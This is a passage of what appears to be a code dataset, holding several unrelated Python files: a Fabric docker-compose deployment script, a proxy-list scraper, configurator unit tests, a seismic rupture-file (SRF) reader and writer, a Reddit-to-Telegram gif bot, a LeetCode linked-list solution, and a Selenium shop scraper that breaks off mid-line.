env.run_func('docker-compose -f {} stop'.format(compose_file))\n\n\ndef remove_container(compose_file):\n \"\"\" Remove targeted containers without asking confirmation and\n remove volumes associated with containers\n \"\"\"\n env.run_func('docker-compose -f {} rm -v -f'.format(compose_file))\n\n\ndef migrate(compose_file, revision='head'):\n env.run_func('docker-compose -f {} run --rm --no-deps kirin flask db upgrade {}'\n .format(compose_file, revision))\n\n\ndef restart(compose_file, first_time=False):\n \"\"\" Restart containers properly \"\"\"\n # Unless the platform is empty, previous container needs to be managed\n if not first_time:\n stop_container(compose_file)\n remove_container(compose_file)\n remove_targeted_images()\n start_container(compose_file)\n\n\ndef test_deployment():\n \"\"\" Verify api kirin is OK \"\"\"\n\n headers = {'Host': env.kirin_host}\n api_root_node = env.host_string\n if env.is_local: # for a local deployment, port 80 is not mandatory\n api_root_node = '{}:{}'.format(env.host_string, env.kirin_host_port)\n request = 'http://{}/status'.format(api_root_node)\n\n try:\n Retrying(stop_max_delay=30000, wait_fixed=100,\n retry_on_result=lambda resp: resp is None or resp.status_code != 200)\\\n .call(check_node, request, headers)\n except Exception as e:\n abort(e)\n print(\"{} is OK\".format(request))\n\n\n@task\ndef use(module_path, *args):\n pos = module_path.rfind(\".\")\n if pos == -1:\n path, f_name = module_path, module_path\n else:\n path, f_name = module_path[:pos], module_path[pos+1:]\n module = import_module(path)\n getattr(module, f_name)(*args)\n\n\ndef hostname2node(host):\n \"\"\" Return the node name equivalent to hostname\"\"\"\n # clean the host which can contain usernames from fabric\n # for example : user@hostname.suffix 
-> hostname\n suffix_to_remove = getattr(env, 'hostname_suffix_to_remove', '')\n host_only = host.replace(env.user + '@', '').replace(suffix_to_remove, '')\n\n return host_only\n\n\ndef upload_template(filename, destination, context=None, **kwargs):\n kwargs['use_jinja'] = True\n kwargs['template_dir'] = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'templates')\n kwargs['context'] = context\n kwargs['use_sudo'] = False\n kwargs['backup'] = False\n _upload_template(filename, destination, **kwargs)\n","sub_path":"fabfile/fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":11980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"220013823","text":"#coding: utf-8\n__author__ = 'liufei'\n\nimport sys, time, threading\nfrom proxier.youdaili import youdaili\nfrom proxier.kuaidaili import kuaidaili\nfrom proxier.swei360 import swei360\nfrom proxier.xicidaili import xicidaili\nfrom lib.base import base\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\nclass spider:\n def __init__(self, iptype):\n self.iptype = iptype # 0: 抓取快代理&西刺的高匿代理 # 1: 抓取有代理的所有免费代理 # other: 抓取快代理&西刺&有代理的所有免费代理\n self.ydl = youdaili()\n self.kdl = kuaidaili()\n self.sw360 = swei360()\n self.xcdl = xicidaili()\n\n def run(self, filename, updateGap):\n while True:\n if self.iptype == 0: # 抓取360三维代理&西刺的高匿代理\n self.xcdl.save(filename, \"w\")\n self.sw360.save(filename, \"a\")\n elif self.iptype == 1: # 抓取有代理的所有免费代理\n self.ydl.save(filename, \"w\")\n else: # 抓取360三维代理&西刺&有代理的所有免费代理\n self.ydl.save(filename, \"w\")\n self.xcdl.save(filename, \"a\")\n self.sw360.save(filename, \"a\")\n time.sleep(updateGap)\n\nif __name__ == \"__main__\":\n sp = spider(0)\n threads = []\n threads.append(threading.Thread(target=sp.run, args=(\"proxies.txt\", 300)))\n threads.append(threading.Thread(target=base.httpService))\n for t in threads:\n t.setDaemon(True)\n t.start()\n for t in threads:\n t.join()\n\n # 访问抓取的代理地址, 例: http://127.0.0.1:8083/proxies.txt\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"568355831","text":"import unittest\nimport vodka.config\nimport vodka.config.configurator\nimport sys\n\n\nclass Handler(vodka.config.Handler):\n a = vodka.config.Attribute(str)\n b = vodka.config.Attribute(str, default=\"something\")\n c = vodka.config.Attribute(list, default=[])\n d = vodka.config.Attribute(dict, default={})\n e = vodka.config.Attribute(dict, default={})\n f = vodka.config.Attribute(dict, help_text=\"manually\")\n\n @classmethod\n def configure_e(cls, configurator, cfg, path):\n _cfg = {}\n configurator.configure(_cfg, HandlerE, path=\"{}.{}\".format(path, \"test\"))\n cfg[\"e\"] = {\"test\": _cfg}\n\n\nclass HandlerE(vodka.config.Handler):\n a = vodka.config.Attribute(str)\n b = vodka.config.Attribute(str, default=\"else\")\n\n\nclass Configurator(vodka.config.configurator.Configurator):\n def set_values(self, **kwargs):\n self.prompt_values = kwargs\n\n def prompt(self, k, default=None, *args, **kwargs):\n return self.prompt_values.get(k, default)\n\n\nclass TestConfigurator(unittest.TestCase):\n def test_configurator(self):\n configurator = Configurator(None)\n\n cfg = {}\n configurator.set_values(\n **{\n \"a\": \"what\",\n \"b\": \"something\",\n \"c\": \"nope\",\n \"d\": \"nope\",\n \"e.test.a\": \"who\",\n }\n )\n configurator.configure(cfg, Handler)\n self.assertEqual(\n cfg,\n {\"a\": \"what\", 
\"b\": \"something\", \"e\": {\"test\": {\"a\": \"who\", \"b\": \"else\"}}},\n )\n\n self.assertEqual(configurator.action_required, [\"f: manually\"])\n\n def test_configurator_skip_defaults(self):\n configurator = Configurator(None, skip_defaults=True)\n\n cfg = {}\n configurator.set_values(\n **{\n \"a\": \"what\",\n \"b\": \"other\",\n \"c\": \"nope\",\n \"d\": \"nope\",\n \"e.test.a\": \"who\",\n \"e.test.b\": \"where\",\n }\n )\n configurator.configure(cfg, Handler)\n self.assertEqual(\n cfg,\n {\"a\": \"what\", \"b\": \"something\", \"e\": {\"test\": {\"a\": \"who\", \"b\": \"else\"}}},\n )\n\n def test_configurator_override_defaults(self):\n configurator = Configurator(None)\n\n cfg = {}\n configurator.set_values(\n **{\n \"a\": \"what\",\n \"b\": \"other\",\n \"c\": \"nope\",\n \"d\": \"nope\",\n \"e.test.a\": \"who\",\n \"e.test.b\": \"where\",\n }\n )\n configurator.configure(cfg, Handler)\n self.assertEqual(\n cfg, {\"a\": \"what\", \"b\": \"other\", \"e\": {\"test\": {\"a\": \"who\", \"b\": \"where\"}}}\n )\n\n def test_configurator_skip_existing(self):\n configurator = Configurator(None)\n\n cfg = {\"a\": \"why\"}\n configurator.set_values(\n **{\n \"a\": \"what\",\n \"b\": \"other\",\n \"c\": \"nope\",\n \"d\": \"nope\",\n \"e.test.a\": \"who\",\n \"e.test.b\": \"where\",\n }\n )\n configurator.configure(cfg, Handler)\n self.assertEqual(\n cfg, {\"a\": \"why\", \"b\": \"other\", \"e\": {\"test\": {\"a\": \"who\", \"b\": \"where\"}}}\n )\n","sub_path":"tests/test_configurator.py","file_name":"test_configurator.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"691063","text":"\"\"\"\nUtilities for Graves Standard Rupture Format (SRF).\n\nSRF is documented at http://epicenter.usc.edu/cmeportal/docs/srf4.pdf\n\"\"\"\n\ndef open_(fh, mode='r'):\n \"\"\"\n Open a regular or compressed file if not already opened.\n \"\"\"\n if isinstance(fh, basestring):\n import os, gzip\n fh = os.path.expanduser(fh)\n if fh.endswith('.gz'):\n fh = gzip.open(fh, mode)\n else:\n fh = open(fh, mode)\n return fh\n\ndef read(fh):\n \"\"\"\n Read SRF file.\n\n Given file handle fh, return SRF metadata/data pair of dictionaries. The first\n dict 'meta' contains scalars and metadata. 
The second dict 'data' contains\n NumPy arrays.\n \"\"\"\n import numpy as np\n\n fh = open_(fh)\n\n # mks units\n u_km = 1000\n u_cm = 0.01\n u_cm2 = 0.0001\n\n # header block\n meta = {}\n meta['version'] = fh.next().split()[0]\n s = fh.next().split()\n if s[0] == 'PLANE':\n plane = []\n for i in range(int(s[1])):\n s = fh.next().split() + fh.next().split()\n if len(s) != 11:\n raise Exception('error reading %s' % fh.name)\n j, k = int(s[2]), int(s[3])\n x, y = float(s[4]) * u_km, float(s[5]) * u_km\n seg = {\n 'shape': [j, k],\n 'length': [x, y],\n 'area': x * y,\n 'delta': [x / j, y / k],\n 'topcenter': [float(s[0]), float(s[1]), float(s[8])],\n 'strike': float(s[6]),\n 'dip': float(s[7]),\n 'hypocenter': [float(s[9]) * u_km, float(s[10]) * u_km],\n }\n plane += [seg]\n s = fh.next().split()\n meta['plane'] = plane\n if s[0] != 'POINTS':\n raise Exception('error reading %s' % fh.name)\n meta['nsource'] = n = int(s[1])\n\n # data block\n data = {}\n keys_2i = 'nt1', 'nt2', 'nt3'\n keys_2f = (\n 'lon', 'lat', 'dep', 'stk', 'dip', 'rake', 'area',\n 't0', 'dt', 'slip1', 'slip2', 'slip3',\n )\n for k in keys_2i:\n data[k] = np.empty(n, 'i')\n for k in keys_2f:\n data[k] = np.empty(n, 'f')\n sv1, sv2, sv3 = [], [], []\n for i in range(n):\n k = fh.next().split() + fh.next().split()\n if len(k) != 15:\n raise Exception('error reading %s %s' % (fh.name, i))\n data['lon'][i] = float(k[0])\n data['lat'][i] = float(k[1])\n data['dep'][i] = float(k[2]) * u_km\n data['stk'][i] = float(k[3])\n data['dip'][i] = float(k[4])\n data['rake'][i] = float(k[8])\n data['area'][i] = float(k[5]) * u_cm2\n data['t0'][i] = float(k[6])\n data['dt'][i] = float(k[7])\n data['slip1'][i] = float(k[9]) * u_cm\n data['slip2'][i] = float(k[11]) * u_cm\n data['slip3'][i] = float(k[13]) * u_cm\n data['nt1'][i] = nt1 = int(k[10])\n data['nt2'][i] = nt2 = int(k[12])\n data['nt3'][i] = nt3 = int(k[14])\n sv = []\n n = np.cumsum([nt1, nt2, nt3])\n while len(sv) < n[-1]:\n sv += fh.next().split()\n if len(sv) != n[-1]:\n raise Exception('error reading %s %s' % (fh.name, i))\n sv1 += [float(f) * u_cm for f in sv[:n[0]]]\n sv2 += [float(f) * u_cm for f in sv[n[0]:n[1]]]\n sv3 += [float(f) * u_cm for f in sv[n[1]:]]\n\n # slip velocity arrays\n data['sv1'] = sv1 = np.array(sv1, 'f')\n data['sv2'] = sv2 = np.array(sv2, 'f')\n data['sv3'] = sv3 = np.array(sv3, 'f')\n\n # reshape array (only handles a single plane for now)\n if len(meta['plane']) == 1:\n n = meta['plane'][0]['shape']\n for k in keys_2f + keys_2i:\n data[k] = data[k].reshape(n[::-1]).T\n\n # useful meta data\n i1 = (data['nt1'] > 0).sum()\n i2 = (data['nt2'] > 0).sum()\n i3 = (data['nt3'] > 0).sum()\n meta['nsource_nonzero'] = i1 + i2 + i3\n i = np.argmin(data['t0'])\n meta['hypocenter'] = [\n float(data['lon'].flat[i]),\n float(data['lat'].flat[i]),\n float(data['dep'].flat[i]),\n ]\n meta['area'] = a = float(data['area'].sum(dtype='d'))\n meta['potency'] = p = float(np.sqrt(\n (data['area'] * data['slip1']).sum(dtype='d') ** 2 +\n (data['area'] * data['slip2']).sum(dtype='d') ** 2 +\n (data['area'] * data['slip3']).sum(dtype='d') ** 2\n ))\n meta['displacement'] = p / a\n\n return meta, data\n\n\ndef write(fh, srf):\n \"\"\"\n Write SRF file.\n \"\"\"\n import numpy as np\n\n fh = open_(fh)\n\n # mks units\n u_km = 0.001\n u_cm = 100\n u_cm2 = 10000\n\n # header block\n meta, data = srf\n fh.write('%s\\n' % meta['version'])\n if 'plane' in meta:\n for i, seg in enumerate(meta['plane']):\n fh.write('PLANE %s\\n%s %s %s %s %s %s\\n%s %s %s %s %s\\n' % (\n i + 1,\n 
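# Bookkeeping sketch for the slip-rate streams parsed by read() above: each
# source contributes nt samples to one flat array, so cumulative counts give
# the slice boundaries (toy values below).
import numpy as np

nt = np.array([3, 2, 4])                       # samples per source
flat = np.arange(nt.sum(), dtype='f')          # concatenated time series
bounds = np.concatenate([[0], np.cumsum(nt)])
series = [flat[bounds[k]:bounds[k + 1]] for k in range(nt.size)]
assert [len(s) for s in series] == [3, 2, 4]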
seg['topcenter'][0],\n seg['topcenter'][1],\n seg['shape'][0],\n seg['shape'][1],\n seg['length'][0] * u_km,\n seg['length'][1] * u_km,\n seg['strike'],\n seg['dip'],\n seg['topcenter'][2],\n seg['hypocenter'][0] * u_km,\n seg['hypocenter'][1] * u_km,\n ))\n\n # data block\n n = meta['nsource']\n fh.write('POINTS %s\n' % n)\n i1 = 0\n i2 = 0\n i3 = 0\n for i in range(n):\n fh.write('%s %s %s %s %s %s %s %s\n%s %s %s %s %s %s %s\n' % (\n data['lon'][i],\n data['lat'][i],\n data['dep'][i] * u_km,\n data['stk'][i],\n data['dip'][i],\n data['area'][i] * u_cm2,\n data['t0'][i],\n data['dt'][i],\n data['rake'][i],\n data['slip1'][i] * u_cm,\n data['nt1'][i],\n data['slip2'][i] * u_cm,\n data['nt2'][i],\n data['slip3'][i] * u_cm,\n data['nt3'][i],\n ))\n n1 = data['nt1'][i]\n n2 = data['nt2'][i]\n n3 = data['nt3'][i]\n s1 = data['sv1'][i1:i1+n1] * u_cm\n s2 = data['sv2'][i2:i2+n2] * u_cm\n s3 = data['sv3'][i3:i3+n3] * u_cm\n s = np.concatenate([s1, s2, s3])\n i = s.size // 6 * 6\n np.savetxt(fh, s[:i].reshape([-1,6]), '%13.5e', '')\n np.savetxt(fh, s[i:].reshape([1,-1]), '%13.5e', '')\n i1 += n1\n i2 += n2\n i3 += n3\n return\n\n\ndef write_sord(path, srf, delta=(1,1,1), proj=None, dbytes=4):\n \"\"\"\n Write SORD potency tensor input files.\n\n Parameters\n ----------\n path: file name root\n srf: (meta, data) SRF dictionaries\n delta: grid step size (dx, dy, dz)\n proj: function to project lon/lat to logical model coordinates\n dbytes: 4 or 8\n \"\"\"\n from . import coord\n\n # setup\n meta, data = srf\n i_ = 'i%s' % dbytes\n f_ = 'f%s' % dbytes\n\n # time\n i1 = data['nt1'] > 0\n i2 = data['nt2'] > 0\n i3 = data['nt3'] > 0\n with open(path + 'nt.bin', 'wb') as f1:\n with open(path + 'dt.bin', 'wb') as f2:\n with open(path + 't0.bin', 'wb') as f3:\n data['nt1'][i1].astype(i_).tofile(f1)\n data['nt2'][i2].astype(i_).tofile(f1)\n data['nt3'][i3].astype(i_).tofile(f1)\n for i in i1, i2, i3:\n data['dt'][i].astype(f_).tofile(f2)\n data['t0'][i].astype(f_).tofile(f3)\n\n # coordinates\n x = data['lon']\n y = data['lat']\n z = data['dep']\n if proj:\n rot = coord.rotation(x, y, proj)[1]\n x, y = proj(x, y)\n else:\n rot = 0.0\n x /= delta[0]\n y /= delta[1]\n z /= delta[2]\n with open(path + 'xi1.bin', 'wb') as f1:\n with open(path + 'xi2.bin', 'wb') as f2:\n with open(path + 'xi3.bin', 'wb') as f3:\n for i in i1, i2, i3:\n x[i].astype(f_).tofile(f1)\n y[i].astype(f_).tofile(f2)\n z[i].astype(f_).tofile(f3)\n del(x, y, z)\n\n # fault local coordinate system\n s1, s2, n = coord.slip_vectors(data['stk'] + rot, data['dip'], data['rake'])\n p1 = data['area'] * coord.potency_tensor(n, s1)\n p2 = data['area'] * coord.potency_tensor(n, s2)\n p3 = data['area'] * coord.potency_tensor(n, n)\n del(s1, s2, n)\n\n # tensor components: diagonal (w11, w22, w33), then off-diagonal (w23, w31, w12)\n with open(path + 'w11.bin', 'wb') as f11:\n with open(path + 'w22.bin', 'wb') as f22:\n with open(path + 'w33.bin', 'wb') as f33:\n for p, i in (p1, i1), (p2, i2), (p3, i3):\n p[0,0,i].astype(f_).tofile(f11)\n p[0,1,i].astype(f_).tofile(f22)\n p[0,2,i].astype(f_).tofile(f33)\n with open(path + 'w23.bin', 'wb') as f23:\n with open(path + 'w31.bin', 'wb') as f31:\n with open(path + 'w12.bin', 'wb') as f12:\n for p, i in (p1, i1), (p2, i2), (p3, i3):\n p[1,0,i].astype(f_).tofile(f23)\n p[1,1,i].astype(f_).tofile(f31)\n p[1,2,i].astype(f_).tofile(f12)\n del(p1, p2, p3)\n\n # time history; keep the source count separate from the per-source sample count\n i1 = 0\n i2 = 0\n i3 = 0\n with open(path + 'history.bin', 'wb') as fh:\n nsource = meta['nsource']\n for i in range(nsource):\n n = data['nt1'][i]\n s = data['sv1'][i1:i1+n].cumsum() * data['dt'][i]\n 
s.astype(f_).tofile(fh)\n i1 += n\n for i in range(nsource):\n n = data['nt2'][i]\n s = data['sv2'][i2:i2+n].cumsum() * data['dt'][i]\n s.astype(f_).tofile(fh)\n i2 += n\n for i in range(nsource):\n n = data['nt3'][i]\n s = data['sv3'][i3:i3+n].cumsum() * data['dt'][i]\n s.astype(f_).tofile(fh)\n i3 += n\n return\n\n\ndef write_awp(fh, srf, t, mu, lam=0.0, delta=1.0, proj=None,\n binary=True, interp='linear'):\n \"\"\"\n Write ODC-AWP moment rate input file.\n\n Parameters\n ----------\n fh: file handle\n srf: (meta, data) SRF dictionaries\n t: array of time values\n mu, lam: elastic moduli\n delta: grid step size, single value or [dx, dy, dz]\n proj: Function to project lon/lat to logical model coordinates\n binary: If true, write AWP binary format, otherwise text format.\n interp: interpolation method, linear or cubic\n \"\"\"\n import numpy as np\n method = interp # the module import below shadows the 'interp' parameter\n from . import coord, interp\n\n fh = open_(fh)\n\n # parameters\n meta, data = srf\n if type(delta) not in (tuple, list):\n delta = delta, delta, delta\n x = data['lon']\n y = data['lat']\n z = data['dep']\n dt = data['dt']\n t0 = data['t0']\n stk = data['stk']\n dip = data['dip']\n rake = data['rake']\n area = data['area']\n\n # coordinates\n if proj:\n rot = coord.rotation(x, y, proj)[1]\n x, y = proj(x, y)\n else:\n rot = 0.0\n jj = (x / delta[0] + 1.5).astype('i')\n kk = (y / delta[1] + 1.5).astype('i')\n ll = (z / delta[2] + 1.5).astype('i')\n del(x, y, z)\n\n # moment tensor components\n s1, s2, n = coord.slip_vectors(stk + rot, dip, rake)\n m1 = mu * area * coord.potency_tensor(n, s1) * 2.0\n m2 = mu * area * coord.potency_tensor(n, s2) * 2.0\n m3 = lam * area * coord.potency_tensor(n, n) * 2.0\n del(s1, s2, n)\n\n # write file\n s = np.zeros_like # s(t) builds a zero baseline array shaped like t\n i1 = 0\n i2 = 0\n i3 = 0\n for i in range(dt.size):\n n1 = data['nt1'][i]\n n2 = data['nt2'][i]\n n3 = data['nt3'][i]\n s1 = data['sv1'][i1:i1+n1]\n s2 = data['sv2'][i2:i2+n2]\n s3 = data['sv3'][i3:i3+n3]\n t1 = t0[i], t0[i] + dt[i] * (n1 - 1)\n t2 = t0[i], t0[i] + dt[i] * (n2 - 1)\n t3 = t0[i], t0[i] + dt[i] * (n3 - 1)\n s1 = interp.interp1(t1, s1, t, s(t), method, bound=True)\n s2 = interp.interp1(t2, s2, t, s(t), method, bound=True)\n s3 = interp.interp1(t3, s3, t, s(t), method, bound=True)\n ii = np.array([[jj[i], kk[i], ll[i]]], 'i')\n mm = np.array([\n m1[0,0,i] * s1 + m2[0,0,i] * s2 + m3[0,0,i] * s3,\n m1[0,1,i] * s1 + m2[0,1,i] * s2 + m3[0,1,i] * s3,\n m1[0,2,i] * s1 + m2[0,2,i] * s2 + m3[0,2,i] * s3,\n m1[1,1,i] * s1 + m2[1,1,i] * s2 + m3[1,1,i] * s3,\n m1[1,0,i] * s1 + m2[1,0,i] * s2 + m3[1,0,i] * s3,\n m1[1,2,i] * s1 + m2[1,2,i] * s2 + m3[1,2,i] * s3,\n ])\n if binary:\n mm.astype('f').tofile(fh)\n else:\n np.savetxt(fh, ii, '%d')\n np.savetxt(fh, mm.T, '%14.6e')\n i1 += n1\n i2 += n2\n i3 += n3\n return\n\n\ndef plot(srf, key='slip1', clim=[0, 10], scale=0.1, cmap='wbgr'):\n \"\"\"\n Plot fault surface for simple plane geometry only.\n \"\"\"\n import numpy as np\n from matplotlib import pyplot\n from . import coord\n from . 
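# What interp.interp1 is asked to do in write_awp above, sketched with plain
# numpy linear interpolation: resample one source time function onto a common
# time axis, zero outside the source's own window (toy values, generic names).
import numpy as np

t_common = np.linspace(0.0, 2.0, 21)
t0, dt = 0.5, 0.1
sv = np.array([0.0, 1.0, 2.0, 1.0, 0.0])
t_src = t0 + dt * np.arange(sv.size)
resampled = np.interp(t_common, t_src, sv, left=0.0, right=0.0)
assert resampled.shape == t_common.shape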
import plt\n\n # extract data\n meta, data = srf\n slip = data[key]\n trup = data['t0']\n x, y = meta['plane'][0]['length']\n delta = meta['plane'][0]['delta']\n strike = meta['plane'][0]['strike']\n\n # dimensions\n x *= 0.001\n y *= 0.001\n extent = 0, x, 0, y\n axis = 0, x, y, 0\n\n # setup figure\n tic = 0.005 * pyplot.rcParams['font.size']\n x = 6 * tic + scale * x\n y = 8 * tic + scale * y\n axes = 4 * tic / x, 4 * tic / y, (x - 6 * tic) / x, (y - 8 * tic) / y\n tic /= scale\n fig = pyplot.figure(None, [x, y], 100, 'w')\n ax = fig.add_axes(axes)\n\n # slip image\n cmap = plt.colormap(cmap)\n im = ax.imshow(\n slip.T,\n cmap = cmap,\n extent = extent,\n origin = 'lower',\n interpolation = 'nearest',\n )\n im.set_clim(*clim)\n\n # rupture contours\n m, n = trup.shape\n x, y = 0.5 + np.mgrid[0:m,0:n]\n x *= 0.001 * delta[0]\n y *= 0.001 * delta[1]\n c = range(int(trup.max() + 1))\n ax.contour(x, y, trup, c, colors='k')\n\n # direction labels\n a = coord.compass(strike + 180.0)\n b = coord.compass(strike)\n ax.text(0, -tic, a, va='baseline', ha='left')\n ax.text(axis[1], -tic, b, va='baseline', ha='right')\n\n # length scales\n ax.axis('image')\n ax.axis(axis)\n x = ax.get_xlim()\n y = ax.get_ylim()[0] + 2 * tic\n plt.lengthscale(ax, x, [y, y], 2 * tic, '%g km', backgroundcolor='w')\n x = -2 * tic\n y = ax.get_ylim()\n plt.lengthscale(ax, [x, x], y, 2 * tic, '%g km', backgroundcolor='w')\n\n # ticks\n ax.set_xticks([])\n ax.set_yticks([])\n\n return fig\n\n\ndef write_coulomb(path, srf, proj, scut=0):\n \"\"\"\n Write Coulomb input file.\n\n Parameters\n ----------\n path: fine name on disk\n srf: (meta, data) SRF dictionaries\n proj: PyProj map projection instance\n scut: slip-rate below which values are not output\n \"\"\"\n import math\n import numpy as np\n from . 
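# Hedged sketch of the plot() idea above using stock matplotlib only (the
# cst-specific plt/coord helpers are not reimplemented here): slip as an image,
# rupture time as black contours, toy axis handling.
import numpy as np
from matplotlib import pyplot


def quick_slip_plot(slip, trup, length_km, width_km):
    fig, ax = pyplot.subplots()
    im = ax.imshow(slip.T, extent=(0, length_km, 0, width_km),
                   origin='lower', interpolation='nearest')
    m, n = trup.shape
    x = (0.5 + np.arange(m)) * length_km / m
    y = (0.5 + np.arange(n)) * width_km / n
    ax.contour(x, y, trup.T, colors='k')
    fig.colorbar(im, ax=ax, label='slip (m)')
    return fig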
import coord\n\n # slip components\n meta, data = srf\n s1, s2 = data['slip1'], data['slip2']\n s = np.sin(math.pi / 180.0 * data['rake'])\n c = np.cos(math.pi / 180.0 * data['rake'])\n r1 = -c * s1 + s * s2\n r2 = s * s1 + c * s2\n\n # coordinates\n x, y, z = data['lon'], data['lat'], data['dep']\n rot = coord.rotation(x, y, proj)[1]\n x, y = proj(x, y)\n x *= 0.001\n y *= 0.001\n z *= 0.001\n delta = 0.0005 * meta['plane'][0]['delta'][0]\n dx = delta * np.sin(math.pi / 180.0 * (data['stk'] + rot))\n dy = delta * np.cos(math.pi / 180.0 * (data['stk'] + rot))\n dz = delta * np.sin(math.pi / 180.0 * data['dip'])\n x1, x2 = x - dx, x + dx\n y1, y2 = y - dy, y + dy\n z1, z2 = z - dz, z + dz\n\n # source file\n i = (s1**2 + s2**2) > (np.sign(scut) * scut**2)\n c = np.array([x1[i], y1[i], x2[i], y2[i], r1[i], r2[i], data['dip'][i], z1[i], z2[i]]).T\n with open(path + 'source.inp', 'w') as fh:\n fh.write(coulomb_header.format(**meta))\n np.savetxt(fh, c, coulomb_fmt)\n fh.write(coulomb_footer)\n\n # receiver file\n s1.fill(0.0)\n c = np.array([x1, y1, x2, y2, s1, s1, data['dip'], z1, z2]).T\n with open(path + 'receiver.inp', 'w') as fh:\n fh.write(coulomb_header.format(**meta))\n np.savetxt(fh, c, coulomb_fmt)\n fh.write(coulomb_footer)\n return\n\n\ncoulomb_fmt = ' 1' + 4*' %10.4f' + ' 100' + 5*' %10.4f' + ' Fault 1'\n\ncoulomb_header = \"\"\"\\\nheader line 1\nheader line 2\n#reg1= 0 #reg2= 0 #fixed= {nsource} sym= 1\n PR1= 0.250 PR2= 0.250 DEPTH= 12.209\n E1= 8.000e+005 E2= 8.000e+005\nXSYM= .000 YSYM= .000\nFRIC= 0.400\nS1DR= 19.000 S1DP= -0.010 S1IN= 100.000 S1GD= 0.000\nS2DR= 89.990 S2DP= 89.990 S2IN= 30.000 S2GD= 0.000\nS3DR= 109.000 S3DP= -0.010 S3IN= 0.000 S3GD= 0.000\n\n # X-start Y-start X-fin Y-fin Kode rt.lat reverse dip angle top bot\nxxx xxxxxxxxxx xxxxxxxxxx xxxxxxxxxx xxxxxxxxxx xxx xxxxxxxxxx xxxxxxxxxx xxxxxxxxxx xxxxxxxxxx xxxxxxxxxx\n\"\"\"\n\ncoulomb_footer = \"\"\"\n Grid Parameters\n 1 ---------------------------- Start-x = -100.0\n 2 ---------------------------- Start-y = 0.0\n 3 -------------------------- Finish-x = 500.0\n 4 -------------------------- Finish-y = 400.0\n 5 ------------------------ x-increment = 5.0\n 6 ------------------------ y-increment = 5.0\n Size Parameters\n 1 -------------------------- Plot size = 2.0\n 2 -------------- Shade/Color increment = 1.0\n 3 ------ Exaggeration for disp.& dist. = 10000.0\n\n Cross section default\n 1 ---------------------------- Start-x = -126.4\n 2 ---------------------------- Start-y = -124.6\n 3 -------------------------- Finish-x = 40.0\n 4 -------------------------- Finish-y = 40.0\n 5 ------------------ Distant-increment = 1.0\n 6 ---------------------------- Z-depth = 30.0\n 7 ------------------------ Z-increment = 1.0\n Map info\n 1 ---------------------------- min. lon = -128.0\n 2 ---------------------------- max. lon = -123.0\n 3 ---------------------------- zero lon = -125.0\n 4 ---------------------------- min. lat = 39.5\n 5 ---------------------------- max. 
lat = 42.5\n 6 ---------------------------- zero lat = 40.0\n\"\"\"\n\n","sub_path":"cst/srf.py","file_name":"srf.py","file_ext":"py","file_size_in_byte":17910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"251297425","text":"#encoding:utf-8\n\nimport os\n\nfrom utils import get_url, download_file, telegram_autoplay_limit\n\n\nsubreddit = 'gifs'\nt_channel = '@r_gifs'\n\n\ndef send_post(submission, bot):\n what, gif_url, _ = get_url(submission)\n if what != 'gif':\n return False\n\n title = submission.title\n link = submission.short_link\n\n if submission.over_18:\n url = submission.url\n text = 'NSFW\\n{}\\n{}\\n\\n{}\\n\\nby @r_gifs'.format(url, title, link)\n bot.sendMessage(t_channel, text, disable_web_page_preview=True)\n return True\n\n # Download gif\n if not download_file(gif_url, 'r_gifs.gif'):\n return False\n # Telegram will not autoplay big gifs\n if os.path.getsize('r_gifs.gif') > telegram_autoplay_limit:\n return False \n text = '{}\\n{}\\n\\nby @r_gifs'.format(title, link)\n f = open('r_gifs.gif', 'rb')\n bot.sendDocument(t_channel, f, caption=text)\n f.close()\n return True\n","sub_path":"channels/r_gifs/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"383575823","text":"#\n# @lc app=leetcode id=2 lang=python3\n#\n# [2] Add Two Numbers\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n sum = ListNode(0)\n if l1 or l2:\n if l1 == None:\n l1 = ListNode(0)\n elif l2 == None:\n l2 = ListNode(0)\n add = l1.val + l2.val \n sum.val = add%10\n carry = 1 if add >= 10 else 0\n if carry:\n if l1.next == None:\n l1.next = ListNode(0)\n l1.next.val += 1\n sum.next = self.addTwoNumbers(l1.next, l2.next)\n elif sum.val == 0:\n return None \n return sum\n \n# @lc code=end\n\n","sub_path":"2.add-two-numbers.py","file_name":"2.add-two-numbers.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"646294326","text":"from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport pandas as pd\nfrom time import *\n\nurl = \"https://smartstore.naver.com/lilydress\"\n\noptions = webdriver.ChromeOptions()\noptions.add_argument(\"--start-maximized\")\n# options.add_argument(\"headless\")\n\ndriver = webdriver.Chrome(options=options)\ndriver.implicitly_wait(1)\ndriver.get(url)\n\nelement = driver.find_element_by_css_selector(\"#container > div._1XbSLEY_rb > div > div.kKWaaZzr6M > div > div > div._1AJ8D2PjS4._3nO3wKj4-Z > div > ul._3AV7RVieRB > li:nth-child(1)\")\n# driver.execute_script('arguments[0].scrollIntoView(true);arguments[0].click();', element)\nActionChains(driver).move_to_element(element).click(element).perform()\n\nurls = []\npage = 1\n\nwhile True:\n for num in range(1,41):\n try:\n element = driver.find_element_by_css_selector(\"#CategoryProducts > ul > li:nth-child({0})\".format(num))\n except:\n break\n aa = element.get_attribute('outerHTML').split('\"')\n for i, data in enumerate(aa):\n if '/products/' in data:\n link = 
